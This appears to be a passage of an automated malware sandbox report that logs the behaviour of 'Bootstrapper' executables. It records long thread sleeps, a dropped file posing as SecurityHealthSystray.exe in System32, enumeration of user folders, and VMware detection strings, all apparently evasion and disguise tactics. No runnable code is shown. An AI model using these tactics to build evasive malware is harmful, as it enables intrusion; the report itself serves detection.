Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597096	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594705	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594446	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594273	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 593796	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 576744	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe	Window / User API: threadDelayed 5927	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Window / User API: threadDelayed 1930	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Window / User API: threadDelayed 2094	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Window / User API: threadDelayed 7716	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe			Jump to dropped file
Source: C:\monitordll\componentreviewsavesSession.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ufQLssLX.log			Jump to dropped file

Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598682s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598566s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598412s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598274s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597386s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -596059s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7716	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 7488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599122s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597482s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -597096s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594705s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594446s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594273s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -594015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -593906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -593796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe TID: 7944	Thread sleep time: -576744s >= -30000s	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe TID: 4500	Thread sleep time: -922337203685477s >= -30000s
Source: C:\monitordll\componentreviewsavesSession.exe TID: 3484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\monitordll\componentreviewsavesSession.exe TID: 5084	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\monitordll\componentreviewsavesSession.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\monitordll\componentreviewsavesSession.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\monitordll\componentreviewsavesSession.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00E0A69B
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00E1C220

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E1E6A3 VirtualQuery,GetSystemInfo,

3_2_00E1E6A3

Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598905	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598794	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598682	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598566	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598412	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598274	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597386	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 596059	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599678	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599122	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 597096	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594705	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594446	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594273	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 593796	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Thread delayed: delay time: 576744	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477
Source: C:\monitordll\componentreviewsavesSession.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: Amcache.hve.17.dr	Binary or memory string: VMware
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual USB Mouse
